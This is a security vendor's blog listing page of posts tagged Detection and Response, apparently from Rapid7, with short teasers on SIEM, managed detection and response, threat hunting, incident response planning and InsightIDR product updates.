Posts tagged Detection and Response

4 min MDR

MDR Vendor Must-Haves, Part 5: Multiple Threat Detection Methodologies, Including Deep Attacker Behavior Analysis

The best Managed Detection and Response (MDR) providers use a combination of threat intelligence, User Behavior Analytics (UBA), Attacker Behavior Analytics (ABA), and human threat hunts to provide detection for threats and attackers.

3 min InsightIDR

What’s New in InsightIDR: Q1 2021 in Review

Back at the start of the year, we reflected on some of our 2020 InsightIDR product investments and took a look at what was ahead in 2021. As the first quarter of the year comes to a close, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR.

2 min Managed Detection and Response

MDR Vendor Must-Haves, Part 4: Ingestion of Authentication Data Across Local, Domain, and Cloud Sources

There isn’t a single threat or breach that doesn’t involve attackers using legitimate credentials to cause harm.

4 min Detection and Response

InsightIDR’s Log Search: Recent Enhancements and Upcoming Investments

We recently (virtually) sat down with Mirela Smlatic, a Senior Product Manager for Detection and Response at Rapid7, to hear about enhancements and upcoming investments into InsightIDR’s Log Search capabilities.

2 min Managed Detection and Response

MDR Vendor Must-Haves, Part 3: Ingestion of Other Technology Investments

By the time you’re ready to invest in a Managed Detection and Response (MDR) service, you’ve likely already invested in a number of different security tools aimed at preventing threats and detecting breaches. MDR is a continued investment in this technology, not always a pure replacement.

3 min Managed Detection and Response

MDR Vendor Must-Haves, Part 2: Ingestion of Network Device Data

One area that can offer incredible benefits in a Managed Detection and Response provider is the ingestion of network device data.

4 min Detection and Response

Attack vs. Data: What You Need to Know About Threat Hunting

While the definition of threat hunting may be straightforward—proactively hunting for threats—the reality of implementing a threat-hunting program is a bit more complicated, as there are different threat-hunting methodologies to choose from.

5 min Managed Detection and Response

Rapid7 Recognized as a Strong Performer in the Inaugural Forrester Wave™ for MDR, Q1 2021

Rapid7 has been included among the top vendors in the inaugural Forrester Wave™: Managed Detection and Response, Q1 2021 and recognized as a Strong Performer.

3 min Managed Detection and Response

MDR Vendor Must-Haves, Part 1: Deep Observation of Real-Time Endpoint Data

Assessing Managed Detection and Response (MDR) vendors is no easy task. However, evaluating each based on predetermined tactical prescriptions for what a provider can offer your business can help ensure you are hiring the right fit for you and your team.

18 min Zero-day

Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange

In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server by an attacker referred to as HAFNIUM.

6 min SOAR

SOC Automation with InsightIDR and InsightConnect: Three Key Use Cases to Explore to Optimize Your Security Operations

It may not be a surprise that automating your security operations will augment your team’s skills and expertise to detect and respond to threats with super speed.

4 min Detection and Response

Top Security Trends Driving Threat Detection and Response Priorities Today

The threat landscape continues to grow at a rapid pace, and organizations need security solutions that can keep up.

1 min Detection and Response

InsightIDR’s NTA Capabilities Expanded to AWS

We’re excited to announce we have expanded the Network Traffic Analysis (NTA) capabilities in InsightIDR to support Amazon Web Services (AWS) environments.

2 min InsightIDR

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM.

2 min Cloud Infrastructure

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed.

2 min InsightIDR

Monitor Google Cloud Platform (GCP) Data With InsightIDR

Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly more dispersed security environments

10 min Security Operations Center (SOC)

Talkin’ SMAC: Alert Labeling and Why It Matters

This blog post will demonstrate some common pitfalls of alert labeling, and offers a new framework for SOCs to use.

4 min Customer Perspective

Finding Results at the Intersection of Security and Engineering

In this blog, Chaim Mazal discusses the importance of collaborating with teams to build a comprehensive security culture within an organization.

6 min InsightIDR

InsightIDR: 2020 Highlights and What’s Ahead in 2021

As we kick off the New Year, we wanted to highlight some key InsightIDR product investments and take a look ahead at detection and response in 2021.

4 min InsightIDR

What’s New in InsightIDR: Q4 2020 in Review

As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

2 min InsightIDR

Rapid7’s InsightIDR Introduces Integration with Cybereason

As InsightIDR continues to help teams save time and drive more effective detection and response, we’re excited to announce that customers can now integrate with Cybereason

4 min InsightIDR

Rapid7 Recognized as a Strong Performer Among Security Analytics Providers by Leading Industry Report

We are thrilled to share that Rapid7 has been recognized as a Strong Performer in The Forrester Wave™: Security Analytics Platforms, Q4 2020.

4 min Detection and Response

2021 Detection and Response Planning, Part 4: Planning for Success with a Cloud SIEM

In this post, we’ll explore how a cloud SIEM, like Rapid7 InsightIDR, may be more relevant and impactful than ever before.

5 min InsightIDR

Visualizing Network Traffic Data to Drive Action

In this blog, we cover the top five multi-groupby queries that can be used to visualize network sensor data with the Insight Network Sensor.

4 min Detection and Response

2021 Detection and Response Planning, Part 3: Why 2021 Is the Year for SOC Automation

In this third installment of our series around 2021 security planning, we’re focused on SOC automation.

3 min InsightIDR

Introducing Enhanced Endpoint Telemetry (EET) in InsightIDR

Rapid7 is excited to announce Enhanced Endpoint Telemetry (EET) in our SIEM, InsightIDR.

5 min Detection and Response

2021 Detection and Response Planning, Part 2: Driving SOC Efficiency With a Detections-First Approach to SIEM

In this installment of our security planning series, we’ll explore the importance of reliable detections to drive an efficient security program forward.

4 min InsightIDR

What’s New in InsightIDR: Q3 2020 in Review

This post offers a closer look at some of the recent updates and releases in InsightIDR from Q3 2020.

4 min InsightIDR

Easily Explore Your Log Data with a Single Query in InsightIDR

We are delighted to announce that Log Search now supports grouping by multiple fields in your log data.

6 min Detection and Response

Rapid7 Introduces “Active Response” for End-to-End Detection and Response

We are excited to announce the launch of our new Active Response capability as a part of our MDR Elite service

6 min Detection and Response

2021 Detection and Response Planning, Part 1: Rapid7’s Jeffrey Gardner Breaks Down How CISOs Should Approach Security Planning for the New Year

To kick off this series, we sat down with Jeffrey Gardner, a former Information Security Officer, and recently appointed Practice Advisor for our Detection and Response portfolio here at Rapid7.

2 min InsightIDR

Define What to Parse From Logs with the Custom Parsing Tool in InsightIDR

In InsightIDR, Rapid7’s SIEM tool, customers use log data to detect malicious activity, prove compliance, and gain visibility across their network.

3 min Rapid7 Perspective

Why I Joined Rapid7

In this blog, Jeff Gardner, Rapid7's new Detection & Response Practice Advisor, discusses why he decided to join Rapid7.

3 min InsightIDR

InsightIDR Demo: Cloud-Native SIEM vs. Modern Security Challenges

Grab some popcorn and watch as Rapid7’s demo video gives you a glimpse of InsightIDR in action.

3 min SIEM

Data Ingestion and Data Digestion: What SIEM Log Consumption Tells Us About Modern Attack Patterns

From endpoints and VPN networks to cloud applications, the modern attack surface has expanded—but does your solution stack reflect this?

9 min Virtual Vegas

Virtual Black Hat: Rapid7 Experts Share Key Takeaways from Day 2 Sessions

Our Rapid7 experts attended another day of incredible talks, and have plenty of key takeaways and insights to share about their Virtual Vegas sessions.

9 min Virtual Vegas

Virtual Black Hat: Rapid7 Experts Share Key Takeaways from Day 1 Sessions

Even from home, it can be tough to catch what you want to see at Black Hat, so we had our experts do the work for you as part of our Virtual Vegas event.

3 min InsightIDR

InsightIDR Now Connects to Zoom for Easy Monitoring

Zoom adoption has skyrocketed with spikes in remote working, but web application security needs to be a top priority to avoid disruptions in collaboration.

4 min InsightIDR

What’s New in InsightIDR: H1 2020 in Review

This post offers a closer look at select highlights of what’s new in InsightIDR, our cloud-based SIEM tool, from the first half of 2020.

6 min InsightIDR

Defense in Depth Using Deception Technology in InsightIDR

Today, we are diving into the four pieces of deception technology that Rapid7 offers through our incident detection and response tool, InsightIDR.

5 min Network Traffic Analysis

Top 5 Ways to Get a Network Traffic Source on Your Network

In this blog, we take a look at the top five ways to get a network traffic source on your network.

3 min InsightIDR

Seeing Value From Day One: What You Need to Know About Cloud SIEM Deployment and Configuration

In a fast-paced environment, companies need security solutions that boost visibility and empower IT professionals to act confidently and decisively.

3 min SIEM

Rapid7 Named a 2020 Gartner Peer Insights Customers’ Choice for Security Information Event Management

Rapid7 is excited to announce that we have been recognized as a Gartner Peer Insights Customers’ Choice for Security Information Event Management (SIEM).

7 min Managed Detection and Response

Rapid7 Managed Detection and Response (MDR): The Service that Never Sleeps

In this post, we break-down everything you need to know about Rapid7 Managed Detection and Response (MDR).

5 min Detection and Response

How Rapid7 Customers Are Using Network Traffic Analysis in Detection and Response

In this blog, we discuss how Rapid7 Customers Are Using Network Traffic Analysis in Detection and Response

4 min SIEM

SIEM Security Tools: Six Expensive Misconceptions

Understanding recent improvements to traditional SIEMs incorporated by next-generation solutions proves critical to building a confident security posture.

6 min MDR

Maturing Your Security Posture: Around-the-Clock Threat Detection With Managed Detection & Response (MDR) Services

Recently, we sat down with Jeremiah Dewey, Rapid7’s VP of Managed Services, to chat about how MDR services strengthen traditional security products.

9 min Security Operations Center (SOC)

Moving Toward a Better Signature Metric in SOCs: Detection Efficacy

In this blog, we break-down the "Detection Efficacy" metric within the Security Operation Center (SOC).

3 min Detection and Response

5 Challenges Outsourced Detection and Response Operations Can Help Solve

In this blog, we discuss five challenges that managed detection and response (MDR) operations can help solve.

3 min InsightIDR

How InsightIDR Is Accelerating Detection and Response in Modern Environments

According to The Total Economic Impact™ Of Rapid7 InsightIDR, customers experience increased visibility, decreased incident response time, and significant cost savings after switching to InsightIDR from their previous SIEM.

6 min Managed Detection and Response

Uncooking Eggs: Manual Dridex Dropper Malicious Document Deobfuscation Methods

Learn how to analyze an obfuscated malicious document with a focus on basic static analysis.

3 min SIEM

Analyze Security Data Faster with Visual Search in InsightIDR

Learn how InsightIDR, Rapid7’s SIEM tool, uses visualization to provide powerful security data analysis.

3 min Security Operations Center (SOC)

SOC Automation: Accelerate Threat Detection and Response with SIEM and SOAR

We believe that the best solution to industry-wide struggles with threat detection and response is to increase efficiency using SIEM and SOAR together.

7 min Managed Detection and Response

Top 3 Outcomes Organizations Try to Achieve in Their Incident Detection and Response Programs

In this blog, we break down the top three outcomes organizations try to achieve in their Detection and Response programs.

3 min InsightIDR

The Importance of Network Visibility With a Remote Workforce

As IT and network security staff around the world hurry to roll out more and more VPN and remote access services, it’s important to recognize that security or operational issues can arise.

4 min InsightIDR

3 Common Threats to Look for in Your Network Data

Today, we'll be highlighting three common threats to keep an eye out for in your network data and the best methods of remediation.

5 min Detection and Response

How to Define Business Value for Security Programs

Today, we're evaluating the categorization of Detection and Response program outcomes and Attack Surface Management outcomes uncovered by Rapid7's UX team.

3 min Security Operations Center (SOC)

Intro to the SOC Visibility Triad

In this blog, we break-down the three pillars of the Security Operations Center (SOC) Visibility Triad.

8 min InsightIDR

How to Analyze Your Log Data Using the Log Search API in InsightIDR

In this blog, we discuss how to analyze your log data using InsightIDR's Log Search API.

3 min Detection and Response

InsightIDR: 2019 Year in Review

As we turn the corner into the new year, our team has been looking back at 2019 and reflecting on some of our most exciting updates from InsightIDR.

7 min InsightIDR

10 Threat Detection and Response Resolutions for 2020

From knowing what you have, who may want it, and how they can get it: these 10 IDR resolutions for 2020 are sure to keep you busy.

4 min InsightIDR

Be Audit You Can Be, Part 2: How to Parse Out Fields in Your Logs

In this blog, we take a look at how InsightIDR’s Custom Data Parsing tool can make quick work of parsing out those interesting fields in the logs.

10 min Detection and Response

Unlocking the Power of the InsightIDR Threat API, Part 2

In this post, we’ll demonstrate how to scrape a few sites for possible bad actors using InsightIDR.

7 min InsightIDR

Be Audit You Can Be, Part 1: How to Securely Send and Monitor Your Audit Logs with InsightIDR

In this blog, we discuss how to collect the audit trail from a device or application using InsightVM and InsightIDR.

3 min InsightConnect

Accelerating Incident Response with Threat Intelligence and Alert Enrichment

Rapid7 continues to invest in making automation more accessible for security professionals across the entire Insight Cloud product suite and our standalone SOAR solution, InsightConnect.

13 min InsightIDR

Import External Threat Intelligence with the InsightIDR Threats API

In this blog, we explain how to automate updating threat feeds in InsightIDR using the REST API.

5 min Incident Detection

The Fundamentals of Building a Threat Detection and Response Program

In this post, we’ll summarize some of the key takeaways for businesses looking to further their threat detection and response programs, as well as provide helpful resources that will help you along the way.

5 min Incident Detection

How Attackers Can Harvest Users’ Microsoft 365 Credentials with New Phishing Campaign

In this blog post, Rapid7's MDR services team outlines a unique phishing campaign that utilizes a novel method of scraping organizations’ branded Microsoft 365 tenant login pages to produce highly convincing credential harvesting pages.

8 min AWS

Automating the Cloud: AWS Security Done Efficiently

Today, we are going to be installing software on all your existing EC2 instances across several (or all!) accounts under an organization in AWS.

4 min Cloud Infrastructure

Cloud Security Primer: The Basics You Need to Know

What do you need to do to secure your cloud-based systems while enjoying the competitive benefits of the cloud? Read this blog to find out.

4 min InsightIDR

The Importance of Preventing and Detecting Malicious PowerShell Attacks

In this blog, we will discuss why organizations should care about malicious PowerShell activity, how attackers use PowerShell to steal credentials, and how to prevent and detect malicious PowerShell activity.

5 min InsightIDR

How to Monitor Your AWS S3 Activity with InsightIDR

In this blog, we discuss AWS S3 buckets and how Rapid7's InsightIDR can help you monitor important activity.

3 min Cloud Infrastructure

Why the Modern SIEM Is in the Cloud

Let’s talk about why modern SIEM is in the cloud, what core benefits you can expect, and how it is predicted to evolve as we soar toward 2020.

2 min Research

[Research] Under the Hoodie, 2019 Edition: Lessons Learned from 180 Penetration Tests

Our 2019 Under the Hoodie report covers the measurable results of about 180 penetration tests conducted by Rapid7. Find out what we learned.

4 min Cloud Infrastructure

Your Guide to Securing Multi-Cloud Environments in an IaaS World

In this post, we’ll cover the unique challenges with securing cloud environments, and some best practices specifically focused on securing multi-cloud infrastructure.

4 min InsightIDR

Securing Your Cloud Environments with InsightIDR, Part 2: Amazon Web Services (AWS)

In this blog, we will talk about threat detection for the world’s most popular cloud host, Amazon Web Services (AWS).

3 min InsightIDR

Announcing CyberArk and InsightIDR Integration: Connect CyberArk with InsightIDR to Visualize and Investigate Your Privileged Access

To help companies monitor user behavior, secure privileged access, and identify attacks on passwords, we are teaming up with CyberArk.

3 min Threat Intel

Rapid7 Threat Report Meets MITRE ATT&CK: What We Saw in 2019 Q1

The Q1 edition of our Quarterly Threat Report is unique because all investigated incidents have been mapped to the MITRE ATT&CK framework.

4 min InsightIDR

Why Deploying a SIEM Tool Doesn't Need to Be Complicated: A Pirate Story

Ahoy! In this Blackbeard-inspired blog, we will tell ye’ a tale of navigating your SS SIEM, InsightIDR, through the unpredictable waters of cybersecurity to reach Remediation Island.

2 min Research

Rapid7 Quarterly Threat Report: 2019 Q1

In our recent Quarterly Threat Report, we look at commonly targeted industries, the use of remote entry, and the most common phishing sites by industry.

3 min InsightIDR

Your Pocket Guide for Cloud SIEM Evaluation

In this post, we’ll quickly review five critical questions to help kick-start your cloud SIEM evaluation.

2 min Incident Response

4 Key Lessons from the Citycomp Data Breach

On April 30, 2019 Motherboard reported on a combined data breach and extortion attempt against Citycomp, a network and internet infrastructure firm based in Germany.

5 min InsightIDR

Capture the Flag: Red Team vs. Cloud SIEM

Here's how InsightIDR fared in a recent Capture the Flag (CTF) meetup with a special blue-team element.

3 min Rapid7 Perspective

How to Start a Career in Cybersecurity: From Stay-at-Home Mom to Security Pro-in-Training

My name is Carlota Bindner, and here is my story on how I went from being a stay-at-home mom and community volunteer to participating in Rapid7's Security Consultant Development Program.

4 min Incident Detection

Q4 Threat Report: Analyzing the Top 3 Advanced Threats and Detection Techniques

In this post, we’ll review three major findings based on data from Project Sonar, Project Heisenberg, and our Managed Detection and Response customer base, which leverages our security experts and InsightIDR to unify security data and identify compromises in real-time.

4 min InsightIDR

Forrester Tech Tide for Detection and Response: Is 2019 the Year of Convergence?

Rapid7 was recently recognized for capabilities spanning security user behavior analytics, security analytics, deception technology, SOAR, and file integrity monitoring.

3 min InsightIDR

Utilize File Integrity Monitoring to Address Critical Compliance Needs

To help organizations address their compliance auditing needs, we are excited to introduce file integrity monitoring (FIM) for InsightIDR.

2 min Research

Rapid7 Quarterly Threat Report: Q4 and 2018 Wrap-Up

In our 2018 Q4 Threat Report, we look at our custom Attacker Behavior Analytics rules, examine some new threats we’ve seen this year, and provide some steps to help you secure your organization.

3 min Incident Detection

How to Alert on Rogue DHCP Servers

How to alert on rogue DHCP servers using network traffic as a data source. We look at how you can use Wireshark or LANGuardian to detect DHCP servers.

4 min SIEM

SOC, SIEM, or MDR? How to Choose the Right Options for Your Infosec Program

Choosing between building an in-house SOC, utilizing a SIEM, or outsourcing to an MDR provider? Learn from three peers on how they made their decision.

3 min Breach Response News

PHP Extension and Application Repository (PEAR) Compromise: What You Need to Know

According to the PHP Extension and Application Repository (PEAR), a security breach had been found on the `` web server.

7 min Incident Response

Windows Event Forwarding: The Best Thing You’ve Never Heard Of

This blog post will discuss how to get logs into your SIEM and create custom alerts to detect certain behaviors in those logs.

6 min Research

Q3 Threat Report: Analyzing Three Key Detection Trends

In this post, we will review findings from our 2018 Q3 Threat Report, including common attack types, the Emotet malware, and protocol poisoning.

4 min Research

How Your Organization Can Respond After News of a Major Security Breach

When data breaches occur, there are proactive actions organizations can take to double-check their current-state security posture, practices, and protocols.

7 min Log Search

Rolling with Your Logs, Part 3: Using Regex to Expand Your Search Options

In this final installment of our Log Search series, we’ll look at some simple regular expressions that will greatly expand your Log Search options.

3 min Incident Detection

5 Tips For Monitoring Network Traffic on Your Network

Monitoring traffic on your network is important if you want to keep it secure. These five tips will help you get the most out of your (NTA) tool.

6 min User Behavior Analytics

[Q&A] Why Every Threat Detection Strategy Needs User Behavior Analytics

VP of Product Sam Adams explains how UBA works and how it’s evolved over the years to become a core part of threat detection and response strategies.

6 min Log Search

Rolling with Your Logs, Part 2: Advanced Mode Searches

In the Part 2 of this three-part series on InsightIDR Log Search, we will cover three concepts: parsed logs, groupby function, and log search operations.

2 min Research

Rapid7 Quarterly Threat Report: 2018 Q3

The leaves are falling and it’s getting colder, which means it’s time for our newest Quarterly Threat Report.

5 min Log Search

Rolling with Your Logs, Part 1: Your Guide to Log Search in InsightIDR

In the first installment of this series, we'll cover the three most important basics of log search, then run through a few common Simple Mode searches.

4 min Incident Response

A Day in the Life of a Rapid7 SOC Analyst

Today, we are diving into a day in the life of a Rapid7 security operations center (SOC) analyst, specifically around threat detection and response.

3 min Critical Infrastructure

National Cybersecurity Awareness Month: Incident Response in the Industrial Industry

In the critical infrastructure sector, one common challenge is the integration between kinetic emergency operations and cybersecurity incident response. Use these tactics to integrate these teams more naturally.

3 min Incident Detection

Rapid7 Leads All 'Strong Performers' in 2018 Forrester Wave for Emerging MSSPs

We’re proud to be recognized in the Forrester Wave as the leader in the “Strong Performer” category and to score second highest overall current offering for our Managed Security Services.

1 min Incident Response

Rapid7 Named a Leader in IDC MarketScape for Incident Response Services

We are excited to announce that Rapid7 has been named a Leader in incident response services by the International Data Corporation (IDC).

2 min InsightIDR

Universal Event Formats Q&A: Apply User Behavior Analytics to More of Your Data

Rapid7 is proud to announce a new way to collect log data: Universal Event Formats. Here is a quick Q&A to give you the lowdown.

2 min Incident Response

Customer Panel Recap: Building a Modern Security Program

I recently had the chance to sit down with two Rapid7 customers to hear how they’ve approached building out their security programs and some of the obstacles they’ve encountered in the process.

4 min InsightVM

Automate to Accelerate: Introducing Security Orchestration and Automation on the Rapid7 Insight Platform

Rapid7 is proud to officially announce orchestration and automation on our Insight platform, with automation taking shape in a number of existing products and our new SOAR offering, Rapid7 InsightConnect.

3 min InsightIDR

Detecting Inbound RDP Activity From External Clients

Today, we discuss how to detect inbound RDP activity from external clients.

4 min Automation and Orchestration

Accelerate Incident Response with Security Orchestration and Automation

Security orchestration and automation can be a saving grace in security for many resource-strapped or highly targeted companies.

5 min Incident Detection

How Our Threat Intel Team Crafts Attacker Behavior Analytics

Threat Intel Lead Rebekah Brown discusses how the teams at Rapid7 create Attacker Behavior Analytics, and how that intel is infused into our solutions.

2 min Research

Rapid7 Quarterly Threat Report: 2018 Q2

Our latest Quarterly Threat Report is out, and 2018 has been keeping network defenders on their toes as malicious actors continue to find new ways to compromise networks alongside their tried-and-true types of cyber-attacks.

4 min Incident Response

CIS Critical Security Control 19: Steps for Crafting an Efficient Incident Response and Management Strategy

An effective incident response plan helps you quickly discover attacks, contain the damage, eradicate the attacker's presence, and restore the integrity of your network and systems.

3 min Incident Detection

Detection Reflection: Analyzing 9 Months of Rapid7 Penetration Testing Engagements

In this post, we’ll review results and trends from Under the Hoodie 2018 as they relate to incident detection, including where our red team found success.

5 min Threat Intel

Q&A with Rebekah Brown, Rapid7 Threat Intel Lead, on Attacker Behavior Analytics

Hear from Rebekah Brown, Rapid7’s threat intel lead, on Attacker Behavior Analytics and how Rapid7 is developing next gen threat detections for customers.

2 min Incident Detection

MAC Address Tracker: Generating a Network Inventory Database Using Network Traffic Analysis

Learn how to generate a network inventory database of all MAC addresses in your environment by monitoring your network traffic

2 min Incident Detection

The Rapid7 Belfast Security Operations Centre: Take a Video Tour

Get a behind the scenes look at the managed detection and response (MDR) team in the Rapid7 Belfast SOC. Watch now.

4 min InsightIDR

A Behind the Scenes Look at Attacker Behavior Analytics with our MDR Team

Just a handful of years ago, drive-by exploit kits were how attackers attempted to attack companies and individuals. Today, it’s through the delivery of malicious documents and malware that can quickly contort and disguise where it’s coming from. Attack vectors are constantly evolving—here within our managed detection and response [] (MDR) team at Rapid7, it’s our job to stay several steps ah

3 min Automation and Orchestration

Do You Need Coding Resources on Your Security Team?

Often when security teams think about security automation [/2017/05/18/security-automation/], they worry they don’t have the coding capabilities needed to create, implement, and maintain it. Pulling development resources from the IT team or engineering department can take time; backlogs are long, and revenue-generating projects tend to take priority. Another option is to hire an IT consultant, but this can be pricey and may not be sustainable long-term. Instead, some security teams try to find

3 min InsightIDR

Deception Technology in InsightIDR: Setting Up Honeypots

In order to overcome the adversary, we must first seek to understand. By understanding how attackers operate, and what today’s modern network looks like from an attacker’s perspective, it’s possible to deceive an attacker, or at least have warning around internal network compromise. Today, let’s touch on a classic deception technology [] that continues to evolve: the honeypot. Honeypots are decoy systems, deployed alongside production system

3 min User Behavior Analytics

Deception Technology in InsightIDR: Setting Up Honey Users

Having the ability to detect and respond to user authentication attempts is a key feature of InsightIDR [], Rapid7’s threat detection and incident response solution []. Users can take this ability one step further by deploying deception technology [], like honey users, which come built into the product. A honey user i

5 min Breach Preparedness

Phishing Attacks Duping Your Users? Here’s a Better Anti-Phishing Strategy.

You’ve hired the best of the best and put up the right defenses, but one thing keeps slipping in the door: phishing emails. Part of doing business today, unfortunately, is dealing with phishing attacks []. Few organizations are immune to phishing anymore; it’s on every security team’s mind and has become the number one threat to organizations [

2 min InsightIDR

How to detect SMBv1 scanning and SMBv1 established connections

How to use network traffic analysis (NTA) to detect SMBv1 scanning and SMBv1 established connections.

6 min Incident Detection

Managed Threat Detection and Response: The Questions You Need to Ask Vendors

In this post, Wade Woolwine, managed services director of technology at Rapid7, details our approach to managed detection and response: visibility, analytics, and arming our analysts with smart, customizable automation. Defending the modern enterprise is hard work. Between the need for round-the-clock coverage, technology to provide full visibility across the expanding enterprise, a highly skilled and experienced team, and the business level pressure to “prevent a breach,” there is little wonde

1 min Honeypots

Whiteboard Wednesday: Your 6-Minute Recap of Q1 2018’s Threat Landscape

Gotten a chance to read Rapid7’s Quarterly Threat Report for 2018 Q1 []? If not (or if you’re more of an auditory learner), we’ve put together a 6-minute recap video of the major findings. In our Quarterly Threat Reports [], our security researchers provide a wide-angle view of the threat landscape by leveraging intelligence from the Rapid7 Insight platform [

2 min InsightIDR

Rapid7 Quarterly Threat Report: 2018 Q1

Spring is here, and along with the flowers and the birds, the pollen and the never-ending allergies, we bring you 2018’s first Quarterly Threat Report []! For the year’s inaugural report, we pulled an additional data set: significant events. While we like to look at trends in alerts over time, there is almost never a one-alert-per-incident correlation. Adversary actions involve multiple steps, which generate multiple alerts, and aft

5 min Endpoints

Unifying Security Data: How to Streamline Endpoint Detection and Response

Collecting data from the endpoint can be tedious and complex (to say the least). Between the data streaming from your Windows, Linux, and Mac endpoints, not to mention remote authentication and the processes running on these assets, there is a lot of information to gather and analyze. Unless you have a deep knowledge of operating systems to build this yourself—or additional budget to add these data streams to your SIEM tool [] —it may not be feasibl

4 min InsightIDR

What Makes SIEM Security Alerts Actionable? Automatic Context

Whether you call them alerts, alarms, offenses, or incidents, they’re all worthless without supporting context. A failed login attempt may be completely benign ... unless it happened from an anomalous asset or from a suspicious location. Escalation of a user’s privileges could be due to a special project or job promotion … or because that user’s account was compromised []. Many security monitoring tools today generate false posit

3 min InsightIDR

How to Detect Devices on Your Network Running Telnet Services

Because Telnet is an unencrypted protocol it is important that you monitor your network for any devices running telnet services. Learn more.

4 min InsightIDR

Attacker Behavior Analytics: How InsightIDR Detects Unknown Threats

InsightIDR customers now have an ever-evolving library of attacker behavior detections automatically matched against their data. Read on to learn how Rapid7 SOC and threat intel teams investigate a constant rumbling of attacker behavior and transform it into actionable threat intelligence.

4 min InsightIDR

How to detect weak SSL/TLS encryption on your network

In this blog, we break down how to detect SSL/TLS encryption on your network.

2 min InsightIDR

How to detect new server ports in use on your network

In this blog, we discuss how to detect new server ports in use on your network.

4 min GDPR

GDPR Preparation March and April: Course Correct

Wow, how did March just happen? Living in a country that just fell apart like a clown car because of snow, it’s still feeling decidedly wintery here in the UK, and as a weather obsessed Brit I am fully looking forward to sunnier times. You know, that single day sometime in August. By that time, we’ll have crossed the border into the brave new world of the General Data Protection Regulation (GDPR) [], and like many of you, I am curious as to what t

3 min Incident Response

How to Build an Incident Response Plan: Your Battle Plan

An incident response plan [] can serve as your master blueprint for navigating the challenges of a security incident, ensuring everything is thought out in advance, secured appropriately, and that everyone on the team knows what to do if an issue does arise. In short, a well-crafted incident response plan will help your organization perform at its best by preparing for the worst. [eBook] Prepare for Battle: Building an Incident Response

3 min Incident Response

Today's Threat Landscape Demands User Behavior Analytics

Attackers continue to hide in plain sight by impersonating company users, forcing security teams to overcome two challenges...

3 min GDPR

Tonight I'm gonna IR like it's 99 (days until GDPR)…

Sorry Nena, it was going to be you or Prince that was going to get the headline, and whilst 99 Red Balloons [] is a catchy 80’s classic, I had to give credit to His Royal Purpleness []. It was that or pay tribute to a childhood favourite vanilla ‘whippy’ ice cream, adorned with a Cadbury’s Flake, but I’m not so sure that would resonate so well with a global audience. “Why 99?”, you may ask. Why not a nice roun

4 min InsightIDR

Finding Evil: Why Managed Detection and Response Zeroes In On the Endpoint

This post was co-written with Wade Woolwine [/author/wade-woolwine], Rapid7 Director of Managed Services. What three categories do attackers exploit to get on your corporate network? Vulnerabilities, misconfigurations, and credentials. Whether the attack starts by stealing cloud service credentials, or exploiting a vulnerability on a misconfigured, internet-facing asset, compromising an internal asset is a great milestone for an intruder. Once an endpoint is compromised, the attacker can: *

3 min InsightIDR

How To Detect Unauthorized DNS Servers On Your Network

DNS was never designed as a very secure protocol, and it is a popular target for attackers. Here is how you can detect unauthorized DNS servers on your network

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 4)

This is not a drill. In this final installment, read our recommendations for handling a real incident. Whether opportunistic or targeted, here's what you should be thinking about.

3 min GDPR

MDR and GDPR: More than a lot of letters

With 2018 now well in our sights, the countdown to the General Data Protection Regulation (GDPR) []) is most definitely on. Articles 33 and 34 [] of the GDPR [] require organizations to communicate personal data breaches when there is a high risk of impact to the people to whom the data pertains

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 3)

Now, it’s time for the fun stuff. While an incident response plan review may feel like practicing moves on a wooden dummy, stress testing should feel more like Donnie Yen fighting ten people for bags of rice in Ip Man

2 min SIEM

Rapid7 Excels at Advanced Analytics and User Monitoring in Gartner's 2017 SIEM Critical Capabilities Report

If you’re looking for a SIEM solution [], chances are you’ve at least heard of the Gartner Magic Quadrant for Security Information and Event Management (SIEM) [] . But what about its companion guide, the Critical Capabilities report? Still yes, probably. If you want to understand the various features and integrations your peers need in a SIEM tool [

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 2)

In Part 1, we covered key considerations when drafting an incident response plan. Here, we'll cover the best way to get buy-in from key company stakeholders...

2 min InsightIDR

2017 Gartner Magic Quadrant for SIEM: Rapid7 Named a Visionary

If you’re currently tackling an active SIEM project, it’s not easy to dig through libraries of product briefs and outlandish marketing claims. You can turn to trusted peers, but that’s challenging in a world where most leaders aren’t satisfied with their SIEM [], even after generous amounts of professional services and third-party management. Luckily, Gartner is no stranger to putting vendors to the test, especially for SIEM, where since 2005 they’ve release

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 1)

Creating and testing an IR plan mitigates risk—help your organization perform at its best by preparing it for the worst. Join us for Part 1: drafting the plan.

3 min InsightIDR

An Agent to Rule Them All: InsightIDR Monitors Win, Linux & Mac Endpoints

Today’s SIEM tools [] aren’t just for compliance and post-breach investigations. Advanced analytics, such as user behavior analytics [], are now core to SIEM [/2017/10/16/siem-market-evolution-and-the-future-of-siem-tools/] to help teams find the needles in their ever-growing data stacks. That means in order for project success, the right data sources need to be connected: “If a log falls in a forest a

2 min Incident Detection

Firewall Reporting Excessive SYN Packets? Check Rate of Connections

In this blog, we break-down what you should do if your firewall is reporting excessive SYN packets.

2 min InsightIDR

Faster Investigations, Closer Teamwork: InsightIDR Enhancements

Incident investigations aren’t easy. Imagine investigation as a 100-piece jigsaw puzzle, except there are a million unarranged pieces to build from. Top analysts need to know what “bad” looks like and how to find it, and they must bring a sharp Excel game to stitch everything together...

4 min Incident Detection

Changing the Corporate Network Attacker’s Risk-Reward Paradigm

Defending a corporate network is hard, while attacking one is all too easy. We break down the risk/reward ratio for corporate attackers and what we can do to change it.

5 min SIEM

SIEM Market Evolution And The Future of SIEM Tools

There’s a lot to be learned by watching a market like SIEM adapt as technology evolves, both for the attackers and the analysis.

3 min InsightIDR

InsightIDR Now Supports Multi-Factor Auth and Data Archiving

